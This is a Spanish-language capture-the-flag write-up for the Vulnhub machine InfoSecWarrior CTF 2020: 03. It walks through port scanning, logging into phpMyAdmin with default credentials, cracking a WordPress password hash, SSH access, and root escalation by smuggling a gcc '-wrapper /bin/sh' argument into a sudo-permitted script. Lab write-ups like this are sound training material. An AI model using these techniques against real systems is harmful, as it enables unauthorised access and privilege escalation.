[VLN] InfoSecWarrior CTF 2020: 03

Hoy vamos a hackear la maquina de Vulnhub llamada InfoSecWarrior CTF 2020: 03. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/infosecwarrior-ctf-2020-03,449/

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.73 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-30 15:02 CEST Nmap scan report for ck05.home (192.168.1.73) Host is up (0.00037s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d8:ad:48:16:27:f8:cc:99:3a:2f:db:c1:a9:d5:3a:d1 (RSA) | 256 51:06:ab:78:61:f5:4c:03:a0:8f:01:27:f9:17:51:e7 (ECDSA) |_ 256 d5:63:58:ba:2a:d5:d2:17:cb:63:12:34:d6:cd:b6:b9 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-generator: WordPress 5.3.2 |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: TEST WORDPRESS – Just another WordPress site Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.81 seconds

Tenemos el puerto 22 y el 80 abiertos. Exploramos un poco mas el puerto 80.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.73 -w /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.73 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/03/30 15:07:35 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.htaccess (Status: 403) /phpMyAdmin (Status: 301) /server-status (Status: 403) /wp-content (Status: 301) /wp-includes (Status: 301) /wp-admin (Status: 301) =============================================================== 2020/03/30 15:07:38 Finished ===============================================================

De la salida, lo que llama la atencion es que tiene /phpMyAdmin. Entramos en http://192.168.1.73/phpMyAdmin y probamos passwords por defecto como admin/admin admin/password y la que funciona es root/root. Una vez logueados como root en el phpmyadmin, vamos a la BBDD wpdb y dentro de ella vamos a la tabla wp_users, en dicha tabla vemos los siguientes datos: krishna $P$B7CNxePWZrtyQSLKyQirMzEGoX87qx1 Arrancamos John the Ripper para crackear la clave.

sml@Cassandra:~$ echo '$P$B7CNxePWZrtyQSLKyQirMzEGoX87qx1' > crack.txt sml@Cassandra:~$ john --wordlist=rockyou.txt crack.txt Using default input encoding: UTF-8 Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3]) Cost 1 (iteration count) is 8192 for all loaded hashes Press 'q' or Ctrl-C to abort, almost any other key for status infosec (?) 1g 0:00:11:47 DONE (2020-03-30 15:27) 0.001414g/s 10367p/s 10367c/s 10367C/s info~1992..infosec Use the "--show --format=phpass" options to display all of the cracked passwords reliably Session completed

Ya lo tenemos, krishna/infosec. Probamos estos credenciales en SSH.

Low Shell

sml@Cassandra:~$ ssh krishna@192.168.1.73 krishna@192.168.1.73's password: krishna@ck05:~$ id uid=1001(krishna) gid=1001(krishna) groups=1001(krishna) krishna@ck05:~$ ls msg.txt krishna@ck05:~$ cat msg.txt I configured wordpress for you and make you admin of it. Your login credentials are same as your system login credentials. krishna@ck05:~$

Miramos si puede ejecutar algo con sudo.

krishna@ck05:~$ sudo -l Matching Defaults entries for krishna on ck05: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User krishna may run the following commands on ck05: (loopspell : ALL) NOPASSWD: /home/loopspell/code_compiler.sh krishna@ck05:~$

Miramos que hace el script que podemos ejecutar como loopspell.

krishna@ck05:/home/loopspell$ cat code_compiler.sh #!/bin/sh source_code="${1}" echo "Code is being compiling ..." /usr/bin/gcc $source_code -o $(mktemp) echo "You can find your compiled code in /tmp/ directory."

Lo que hace el script es esperar que le pasemos un nombre de fichero y nos lo compila usando gcc. Podemos usar gcc para obtener una shell pasandole los parametros: -wrapper /bin/sh,-s . Sabiendo esto...

krishna@ck05:/home/loopspell$ sudo -u loopspell /home/loopspell/code_compiler.sh "-wrapper /bin/sh,-s ." Code is being compiling ... $ id uid=1002(loopspell) gid=1002(loopspell) groups=1002(loopspell)

Ya tenemos una shell como loopspell. Miramos si podemos ejecutar algo con sudo.

$ sudo -l Matching Defaults entries for loopspell on ck05: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User loopspell may run the following commands on ck05: (ALL : ALL) /usr/bin/gcc (ALL : ALL) NOPASSWD: /home/loopspell/code_compiler.sh

Podemos ejecutar lo mismo que antes, solo que en este caso podemos hacerlo como root.

Privilege Escalation

$ sudo -u root /home/loopspell/code_compiler.sh "-wrapper /bin/sh,-s ." Code is being compiling ... # id uid=0(root) gid=0(root) groups=0(root) # cd /root # ls root.txt # cat root.txt _________ ___. ____ __. .__ .__ __ _______ .________ \_ ___ \___.__.\_ |__ ___________| |/ _| ____ |__| ____ | |___/ |_ \ _ \ | ____/ / \ \< | | | __ \_/ __ \_ __ \ < / \| |/ ___\| | \ __\ / /_\ \ |____ \ \ \___\___ | | \_\ \ ___/| | \/ | \| | \ / /_/ > Y \ | \ \_/ \/ \ \______ / ____| |___ /\___ >__| |____|__ \___| /__\___ /|___| /__| \_____ /______ / \/\/ \/ \/ \/ \/ /_____/ \/ \/ \/ flag = efa4c284b8e2a15674dfb369384c8bcf This flag is a proof that you get the root shell. Tag me on Twitter with @CyberKnight00

End

Y con esto ya seriamos root de la maquina :)